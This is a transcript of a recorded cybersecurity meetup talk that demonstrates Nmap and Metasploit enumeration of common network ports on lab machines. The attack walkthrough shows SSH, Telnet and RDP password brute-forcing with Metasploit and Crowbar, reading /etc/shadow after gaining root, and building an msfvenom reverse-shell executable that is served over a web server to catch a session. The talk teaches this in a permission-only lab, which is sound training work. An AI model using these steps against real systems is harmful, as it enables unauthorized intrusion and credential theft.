to the DC Cybersecurity Professionals Virtual Meetup Group. I am Tyrone Wilson, the founder and CEO of Cover 6 Solutions. Cover 6 is the organizers of the meetup group. We've been doing this since 2012, January of 2012, over 8,000 members. We're looking to get to 10,000, so spread the word about us. We will do this every week. We'll try to get locked down that 11:30 Eastern time slot on Thursdays. So we're going to try to get 50 talks in this year. So be sure to follow us, spread the word. If you want to present for us, you can go to papercall.io/DC Cyber Warriors. The links will be in the summary. Today we're going to talk about the common services or the common network services, threats and attacks. And I feel like it's very, very important. You know, a lot of people still have trouble remembering what those common ports are. 21, 22, 23, 25, 53, 80, 139, 443, 445, 3389. Right, those are going to be the ones that we focus on today. Time permitting, we'll talk about a little bit more. But not only will we talk about them, you know, we'll talk about, you know, how to attack them and how you can identify these attacks and provide some mitigation with some of the tools. And it's not just me saying that these are important. If you go after the Network Plus exam or the Security Plus exam, they'll list the same amount of ports in their exam objectives. But we are only going to focus on what INMAP describes as the top 10. Right, so how do we identify what those top 10 ports are? I am going to pull out my Kali Linux machine, and I'll show you how we can find that out. So let me log in really quick. This is an older version of Kali Linux. This is 2019.4. So if it looks a little bit different than yours, that is okay. I have installed the Metasploit database, not because I enjoy hacking with Metasploit, but I actually like the database to keep track of my findings. Also, you'll see in the background, I have already started one of my virtual machines from one of our Try Hack Me rooms. So this is our Windows 7 machine. I also have, I'm not sure if you can see it, but I also have our CTF for noobs machine up right there. And then I also have a Metasploitable 2 machine up. So I'm actually targeting 3 machines right now in my little environment, right? And I'll be switching back and forth, and sometimes I'll even get it to a point where I will show you what it looks like dual screen. All right, so using the Metasploit database, we do have a video out there called Understanding the Metasploit Database. If you want to learn more about Metasploit, there is a website called Metasploit Unleashed that you can use. It is a free tutorial that teaches you how to use Metasploit. But I'm going to create a workspace right now, and I'm going to call this workspace DC Cyber Warriors. So everything we do today will be trapped in this workspace. I like to clear my screen, and from here, I believe you can just type the help menu so you can see all of the things that you can do from here. But we're just going to focus on things like hosts, services, creds, and sessions. So our database is empty right now, so we just need to fill that. So what we're going to do is we talked about identifying what the top 10 ports are, or the top 10 most popular ports, and you can use Nmap to figure that out. If you're using the database, you want to do a DB. Let me get my screen a little bit bigger. You can do a DB underscore Nmap -V for verbosity. That just means I want the results of my scan to be displayed on the screen. A -T for the speed. I want it really fast, not insane. I'm going to do a half open scan, often called a stealth scan. It's not so stealthy. -big P, little n, meaning don't ping. And I'm going to do a top ports 10. And my target will be scanme.nmap.org. Normally, I would do a -- open, but I want you to see which ones are open and which ones are closed. So if you just do the -- open, it will only show you the ports that are open, right? So we can see we only have 2 ports open. But if you up arrow and take this out and hit enter again, you'll see that we do have some closed ports on this target. So our top 10 is 21, 22, 23, 25, 80, 110, 139, 443, 445, 3389, and we'll go through them one by one. And we'll probably save this 110 for last. That is related to public email. If you ever happened to try to install Outlook or Hotmail back in the day, you may have seen, a POP3 URL out there. All right, so the one thing about the database is that if you happen to find closed ports, then your database will be filled with closed ports. And sometimes that can get annoying, and that is why I always put in the -- open, so my database only has the open ports, because that's really all I care about. So I will just do a services -D to delete, and I'll do a --S and say only delete. So the --S is the search string, and I'll say only delete those ones that are closed, and maybe I'll just up arrow and delete the filtered ones as well. The other thing is I need to figure out if there are any other devices on my current network. The way you do that is by doing an ifconfig and identifying what your IP address is. So my IP address is 172.16.125.4. I'm just going to copy that. Just going to need it for later. And my net mask is 255.255.255.0. So not to make this a networking class, but that is a /24, so you can use the /24 to scan your current subnet. Question, the scan is a snapshot time, so does your procedure involve running Nmap periodically to see what's changed? Yes, if you were doing an assessment or anything, if you wanted to always keep track of what's going on in your home, then yes, of course, you would always you would run this periodically, maybe weekly. So with that being said, now that we know our IP space, we can up arrow, and instead of doing the scanme.nmap.org, we will do a Shift-Control-V. We'll paste our IP address in there, do a /24 with a -- open. So now you'll see that we found some additional hosts. We found a .8, we found a .10, and I am also going to add the try-hack-me IP. You can barely see it right now, but it is 10.10.184.24. So we're going to copy that one as well. Clear my screen, up arrow this, take that IP out, Shift Control V, and I'm going to scan that machine for the top 10 most popular ports. All right, so now that I have my database, and this is the reason why I love the database, is that now you can use the database to search for what you've discovered. So these are all the machines that have port 21 open, port 22, port 23, port 25, port 80, 443, nothing, 3389. So we got a little bit of everything to go after right now. Ultimately, what we want is the service version of these devices. There's a couple of ways that you can do that. The first way is in Nmap. Instead of using a -S, capital S, you can just change this to an SV for the service version, and then it will take a little bit longer because you're querying for additional information. But once that information comes back, you'll see the service version. And then after that, I'll show you the syntax that you can use inside of the Metasploit database to enumerate your services really, really quickly. And this comes in handy because, you could be doing assessments or penetration testing, and, you can be in an environment that has, 50, 60 or more machines that have port 445 open, or FTP open. So I'm going to show you how to sort through all of that and scan all of that. Another thing that you can do on the back end, if you wanted to, was to run Wireshark. So you can capture this entire enumeration and attack process. You could also save those PCAP files and then import that PCAP into a tool like Security Onion. Wink. We may talk about that again. All right, so you'll see that I actually got the exact service version, SML 5.5. As an attacker, now that you know this, you could literally just Google how to exploit SML 5.5, or you can go to exploit-db.com and search exploits, or you can just probably do a search in your database, and there may be some exploits available already on your machine. We'll show you how to exploit that. No, I'm not going to show you how to exploit, I guess. YouTube doesn't like that. And also, I didn't put that disclaimer out. I'll definitely only do this on a network environment where you have explicit permission. Don't get yourself in trouble. Don't get yourself sent to jail. All right, so the first service we're going to look at is FTP, and there are auxiliary modules in the Metasploit database, and it looks just like this in real time. Version services-p21-R. So I'm going to add this to my target, and then I'm going to hit run, and it is just a service version banner grab as an auxiliary module. So now I have a service version for FTP. FTP actually uses two ports, port 21 and port 20. Port 21 is used to establish a connection, and port 20 is used to send the data back and forth. A couple of things in FTP, that is your file transfer protocol, it is clear text. And when you're transferring files back and forth, there's two modes. There's a ASCII mode and a binary mode, and it does make a difference. Because let's just say you wanted to transfer an exploit up to an FTP server, you want to ensure that you transfer the binaries of that file and not the text. So if you're just transferring a text file and all you needed was the text, then you can stay in ASCII. But if it was a file where you needed the binaries, just type in BI. See what that looks like. Another module I like to use for FTP is in here. They have an anonymous module, which checks for access rights for an anonymous user. And when you're running this, what we want to look for is an FTP service that has read-write permissions. So when you're exploiting a machine, if you can read to it, and if you can write to it, or if you can make changes to it, then there's a really good chance that you can exploit it. So we only have read access here. So that means that for this host, if we open up another shell, we should be able to FTP into this machine. And because anonymous is allowed, like it really doesn't even matter what you put here or what you put here. And you can see that I am in binary mode right now. The syntax will be a little bit different, but if you ever get in trouble, you can type in help and you'll be able to see what the commands you have available to you. But if you have that, that means that you should also have this on the web. So normally what happens is if you can upload a file here, it would show up. So we do have read access, right? We don't have write access, it's only read access. So we can only view the files that would be here. If we had read write access, then we would be able to put, whatever file we want in there, and it would show up. All right, that's FTP. The next one is the SSH, the secure shell, which is the secure version of FTP. So the same process, use auxiliary scanner, SSH version. We will do a services-p 22-r. We found 3 machines and we will run that. So now that it ran that, you'll see that there's different versions of SSH that we identified. So services-p 22. So now if you find a really old version of SSH, then you can probably just perform a straight exploit on that old version. But normally when you see SSH, you would need to have some type of brute forcing apparatus to guess a username and password. And when you're brute forcing usernames and passwords, you want to attack the username that's not going to be locked out, like root or administrator. Inside of the SSH modules, there is inside of the Metasploit database, there's also an SSH, use auxiliary scanner, SSH underscore login module. If you want to see what that looks like, there are some options. You can set your passwords to a password file. You can set a username. You can set a user file. So you can use this tool to do some brute forcing, or you can use a tool like Hydra, or a tool that I use called Sparta has capabilities. There's tons of tools out there, but if we're just going to stick to this, see what directory I'm in. I do have an engagements, CD engagements, CD at DC Cyber Warriors, ls-l. So while I'm in here, I created some files. So I created a users.txt file. I created a passwords.txt file with just some common usernames and passwords really quick so we can test this out. So we'll do a show options and we will set our pass_file to passwords.txt. We'll set our user. Our user file is already set. So now we just need to do a services-p 22-r. And what that does is it adds every machine that we found with port 22 open as our target. If we didn't want to do it that way, we can be more granular in our search. So sometimes you only want to target the Windows 2008 machine. You'll only want to target Windows 2016 machines. So you can make a little change to here and say we only want to target anything that had a 172 in the result. Do I need to be specific? 172. Let's do this. All right, so maybe I just want to target this one that has the word Debian in it. So I'll do it that way, just so you can see that it works. And then I will run it. When you're brute forcing certain services, especially SSH, you need to be careful, because if you successfully guess a username and password, then with this tool, it will create a session. And that means you technically exploited that machine. So again, only do this in an environment that you have permission to do that in. Let's see what's taking so long. Show options. Let's go after all of them. Spelled it wrong. Services -p. So we'll go out after all of them, and then on the back end, these machines like to go to sleep sometimes. So I just turned them back on. So you can see what that looks like. So, we're about that hack life now. So you can also multitask. So what I'll do is I'll open up a second terminal while that brute force is going, get my MSF console going, and then I'll start to go after Telnet. Telnet, port 23, Michael Jordan. Where's number 23? Michael Jordan, Allnet, Telnet. I know it's corny, but that's how I remember it. So I'm going to use this workspace. So as you find information, it's just going to populate the workspace. This workspace is still going. I mean, that scan is still going. So we'll do a use auxiliary scanner telnet underscore version services -p 23-r, and we'll run it. And you can see that the banner from this telnet service says login with MSF admin, MSF admin. So, of course, you would add MSF admin to the users.txt file, in MSF admin to the passwords.txt file. So we can use another module, use auxiliary. Oh, we can save this. Use auxiliary scanner telnet login, show options. Sorry. CD engagements, CD that. These are where my files are. So I am going to set my pass_file to passwords.txt. I'm going to set my user_file to users.txt. I'm going to set my targets of our hosts this way. Services -p 23-r. Save that. Telnet is normally a lot faster, and then I will run that. And what it's going to do is going to go through all of the different options that I had in those files until it correctly guesses the username and password. You can see that for the SSH login, I successfully found 2 usernames, 2 sets of credentials. I have a success for MSF admin and a success for B-Sides Nova 2019 CTF for noobs. But like I mentioned earlier, I also have a session open. And because I have sessions now, it means my database is starting to fill up with information. So there's my hosts. There are my services that I found. You can see I'm slowly starting to fill this up with info as I go through the different ports. Because I successfully guessed passwords, I now have some credentials in my creds. And for future, and this is important because if I wanted to guess or use this tool in the future, there are options to use what's already in your database. So you could say use database all creds, or only use the users from my database because those are already legit. But that also means that we have sessions now, and that also means we also have phones now. So on this date, at this time, this host fell victim to this vulnerability. If you want to do a little bit more research on it, check out this CVE. To interact with the session, sessions-1, and that will get us the shell. So we're in. These are all of our post exploitation will come into play. And I always make this joke, right? There's no balloons, there's no pat on the back, there's no music, there's no nothing for successfully guessing and using a password or exploiting a machine. But you would want to type in some of your post exploitation commands. Who am I? I am MSF admin. Can I see this Etsy shadow directory? No, I can't. So I need to become root. This machine is misconfigured. Who am I now? I am root. So now can I cat d That's the shadow directory. Yes, I can. But what was this SSH? That info would have been encrypted. If we were to do the same thing with Telnet, right, you'll see that we did get a successful Telnet session on port 23 using MSF admin. And to see that, so now we have sessions here. So we have a Telnet session in this terminal and SSH sessions in the other terminal, but that means it still would have added to our creds database, right? Because we're all still using the same workspace. If we wanted to see that in Wireshark, we could just simply do a Wireshark and then for our capture filter, we can say only show port 23 on our E0. So we got the Wireshark going, and that means that if we interact with this Telnet session now, and we do a, oh, I know I messed up something. This is what we'll do. Let's close that. Let's open Wireshark again. We'll get this going, but we'll just say Telnet here. So I should get some results from the who am I, right? So I'm seeing this in Wireshark. We can actually see that I typed in who am I, if config, uname -a. Do I have mmap? Sorry if you can't see that. So I'm doing an mmap -v. I do have an older version of mmap on this machine, which means I can now use this machine to perform an mmap scan of another machine. But in Wireshark, you do a follow TCP stream. All of this telnet traffic is in clear text, so you can see me type in mmap -v. You can see me type in uname -a. You can see me type in if config. If I was to change this to, if I was to stop this capture and restart the capture, but say I only want SSH traffic, and then I go back here and interact with my SSH session again. Better not make me look bad. So what's that? TCP port equals 22. I need to do it that way. Oh, sessions 1. Config. Oh, sorry. If config. So I'll do the same thing. If config, uname -a, mmap -v. But in the SSH session, if you go to follow TCP stream, all of that is encrypted. Boom. So we did 21, 22, 23, 25. So if I didn't want to use InMap to interact with these, if I didn't want to use the Metasploit to interact with these sessions from my terminal, I could have just simply SSH msfadmin at yes, the password is msfadmin, and I'm in. If I wanted to telnet into that machine, I can. You see I got the telnet banner that says msfadmin, msfadmin. So I'll just type in msf. Oh, dang it. I hate when I do that. msfadmin, msfadmin, and I'm in. Boom. Moving forward. Port 25, SMTP. Let's go and background this session. Clear that. We will use auxiliary scanner SMTP, SMTP version, services-p 25. And, oh, I'm sorry. We need to add them as targets, run it. And both of these, so one machine is running SLML 5.5 and another machine is running this ESMTP postfix. So this is what we found there. For, as I mentioned, to exploit certain mail services, oftentimes there's an exploit available. But like I said, I'm not going to show exploits, but I did show that you can use something like that and then use 0 because you want to use the exploit number 0. So 21, 22, 23, 25. What was the next one? 80. Use auxiliary scanner HTTP _version services-p 80. Sorry, dash capital R. We will run that to get all of our service versions. Now that that is complete, services-p 80. Now you have IIS, Apache 2.4, 2.4, 3, 2.2, and there may be exploits available for this specific service, especially if it's an older one. But, you know, there's an entire industry catered for bug bounty programs and web app development, web app testing. It's a whole totally separate world you can start a whole new career in right now. You know, a $300 investment in Burp Suite in your time. Burp Suite, Portswigger, there's a, I think it's called Portswigger University or Burp Suite University. On their website, they will teach you how to test for the Owasp top 10 vulnerabilities. So at a minimum, right now, if you wanted to, you can make a $300 investment in Burp Suite. You can make another, $100, $200 investment for your LLC, create your own website if you want, and start a service saying that you will test for the Owasp top 10 if you wanted to. So these machines have port 80 open, then some of the things that you can do is you can go to your browser and you can put that website in your browser and see what's there. So this is the Metasploitable 2 machine on the port 80. I'm sorry if you can't see it. I can't zoom in here, but it says log in with MSF admin, MSF admin. I like the Metasploitable 2 machine because on the back end, there's Matilde and there's explanation of the Owasp top 10. So there's nothing but time and opportunity that's stopping you from learning this. There's also ways to use this as like a CTF. So you can toggle the different security levels. So right now it's hosed, then yes, there's arrogant, and then there's secure. And try to exploit this machine while it's in secure mode. It's free, 879 megs. I mentioned it on our website. Alex, if you could share it, cover6solutions.com/home-lab-setup. Also, Alex, if you could share that read ahead page. I'll put a lot of videos on the read ahead page. That read ahead page is to help you prepare for our workshops, but I don't mind putting that out. So also on port 80, there's normally a robots.txt, and I'm pretty sure if we check our CTF for noobs machine, you'll see that there's a robots.txt, and in here the robots.txt file is a file that tells search engines not to index this directory, but it means that this directory exists. So there's a directory called CTF for noobs. Shout out to B-Sides Nova. It's coming up. Make sure you all go. We have a ball there. I bring out the margarita machine. So Cover 6 normally has a booth there. We bring out the margarita machines. It's a big deal. It's a big deal. I normally present there as well. So shout out to Sophia and then Marcel. Her and I have put together a lot of the CTF for noobs. This is the CTF for noobs machine. It's about 13 gigs. If anyone wants to give it a shot, Alex, if you could share the URL to this machine. The goal is to get root, but like I said, it's about 13 gigs. And that's what we used for the conference. And it took people, I don't know, 2-3 hours to get it. But this means that there is a CTF for noobs directory in there, and it may be more directories. To target port 80, normally you can also do something simple like using Nikto to target that machine 172.16.125.8. And Nikto is just a really simple web app vulnerability scanner. You can also use Burp Suite. We won't get into that, but very quickly you can see that Nikto found an additional directory for us called files. So that means that we can go to the files directory and see some files. But, you know, of course, there's more. There's an entire bug hunter methodology by Jason Haddix online. They're at version 4 right now. Definitely check that out if attacking web apps are your thing. But we will move on to 2389 RDP. So let's do a use auxiliary scanner RDP. Let's check this out. There is a blue key check. Then we'll do a services-p 3389 and run it. So Sorry. And it will let us know if this host is vulnerable to blue key. This host is showing that it's vulnerable. So if you know the blue key exploit, maybe you can exploit this machine with one of the exploits. So it's not about exploiting, but I'm letting you know that that's how you could do it. Also, you could brute force. You can brute force the RDP, the remote desktop login using a tool like Crowbar. So I'm just going to grab this IP address and what's that? Control C. Oh, stop that. Dang it. What's my history? Nope. Keep forgetting that command. Not a problem. So this is what we're going to do. We are going to brute force our RDP session using a tool called Crowbar. And I'll show you what that looks like. All right. It's normally not installed, so you'd have to just do an apt install Crowbar. It's already installed for me. CD engagements at DC Cyber Warriors. I go here because I like to keep my engagements separate. And then in here, I have a few files. That was just me making sure that it works. And the command would be crowbar dash B for the protocol, RDP dash S for the target server. We want to go after this machine, but with a /32. So only this IP address. The username will be administrator, because that is a Windows machine. The dash word list will be passwords.txt, and the number of threads will be 1. And I will hit enter, and it's going to run through this passwords.txt file until it finds a working set of credentials. Any questions so far? How are we feeling? We're at the 1 hour mark, but we're going to keep going. We're going to keep going till like 12:45. Question, do I mind sharing my webinars to BCA members? Yes, all of the webinars are on the Cover 6 Solutions YouTube channel, and there's a playlist called DC Cyber Warriors Virtual Meetups. All right, so we have a success on this machine. Administrator and password 123 exclamation point. So we can do in our desktop 210.10.184.24. Type in yes. Other user, administrator, password 123. Probably went too quick. Oh, I spelled administrator wrong. And I'm in. All right, so if you're in my Attack and Defend workshop right now, you didn't see that. Earmuffs. So now we're in as an administrator. And normally I put a secrets.txt file on the desktop, and that would be your flag that you need to get. So you can find an exploit or brute force. You just have to find a way in. But normally in if you exploit it, you get a low privilege shell, so you won't be an administrator. You'll just be one of the users. One more example, really quick, is to let's go to cd var www html. Let's make a directory called DC Cyber Warriors, and we will cd into DC Cyber Warriors. Our IP address that we want to use is this. Let me just create something really quick. I am going to do an MSF venom-p windows interpreter first underscore TCP. Now host is this. The port equals 21. Format will be exe, and I'm going to call this DC Cyber Warriors .exe. So that's going to create an exe file that would give me a reverse shell. I am going to start my Apache server. Right, so ls-l, there's my file that was just created. And what I will do is I will get a listener ready by doing a use exploit multi-handler show options set. Yep, that looks right. Exploit -j. So it's waiting for someone to click on that exe. Then from here, I'll do our desktop back into that machine. What was that IP? So now I will our desktop back into that machine. But this time I will not log in as user. I'll log in as student 1 and password 1. I'm sorry, I'm not going to log in as the administrator. I'm going to log in as student 1. Since we're talking about port 80 still, there is a web vulnerability in this version of Internet Explorer, which allows me to go back to this IP / DC Cyber Warriors. There is the exe file. The old versions of Internet Explorer aren't too bright. Let's click on that, and I should get a shell here. Clear sessions 3. And then from here, these are all of the things that I can do now that I have control of that machine. All right, so we talked 21 FTP, 22 SSH, 23 Telnet, 25 SMTP, which is mail, We didn't talk 53, which is DNS. DNS is the backbone of the internet, right? So DNS changes IP addresses to domain names and vice versa. It's kind of like your phone. In your phone, you have your contacts, and a person could have a number for work, a person could have a number for their mobile address, a person could have a number for their home address. And you can't remember that, just like on the internet, a human can't remember what Facebook's IP address is, but the computers can. So we're not going to remember this IPv6 address or this IPv4 address, but we will remember Facebook.com. So to see DNS and reverse DNS in action, all you have to do is put a Firefox in whatever this IP address is, and it should bring you to Facebook. So DNS, reverse DNS, it's working. IPv6 is preferred on the internet. We won't get too deep into that, even though I love IPv6. I did give a talk about IPv6 as well. And I just want to make sure we covered our bases. Let's go and look at this one more time. So really quick, mmap-t5-v-t5-ss-pn-top ports 10 scammy.mmap.org. I just want to make sure we covered them. 21, 22, 23, 25, 80. 443 is essentially the secure version of the web. 139 is NetBIOS. It's what is used to discover things like computer names on Windows hosts. You can see that by doing something like an MBT scan. What is my IP address? Big. We do an MBT scan of this, or MBT scan-R 172.16.125.4. This exploitable machine was sleeping. I'm sorry if I'm all over the place. I'm going to run this again. Nope. Let's find this hack me machine. Give it another shot. MBT scan this IP, and we get computer name. Sometimes if it's misconfigured, there's a user MAC address. All right, the last one, 445, is often the most targeted one because it tells you what version of Windows is running on that machine, along with a couple of other things. So in here, there are modules to see if there's shares open. There is login modules for the 445, right? There is vulnerability checks, but let's stick to the SMB_version first. Services, and I know I'm pressed for time, services-p 445-r, and we will run that. And you'll see that we did find a Linux machine running Samba. The 445 port is SMB, or the service message block. It's highly targeted. if you query that machine using a tool like SMB version, or there's an SMB client tool that will tell you the exact version of Windows that it's running. This is important. On a Linux machine, you can still see port 445 open, what it would be called Samba, which gives Linux some Windows functionalities. Whew. All right, so that was the quick and dirty. Of course, there's more, but I hope I covered a lot. I didn't get into the SMB exploits that much, but let's see what else I can do. SMB use auxiliary scanner. And you can see that it's not necessarily about using Metasploit to exploit machines, but I like it because of the different functions that it has. And let's do this SMB underscore MS1710. And like I said, sometimes in your database, you could have hundreds of different machines that you would want to query at once. And you can see this machine is vulnerable to MSF1710. So maybe there is a exploit module available that will allow us to take advantage of that eternal blue vulnerability. Whew. All right, and that concludes the session.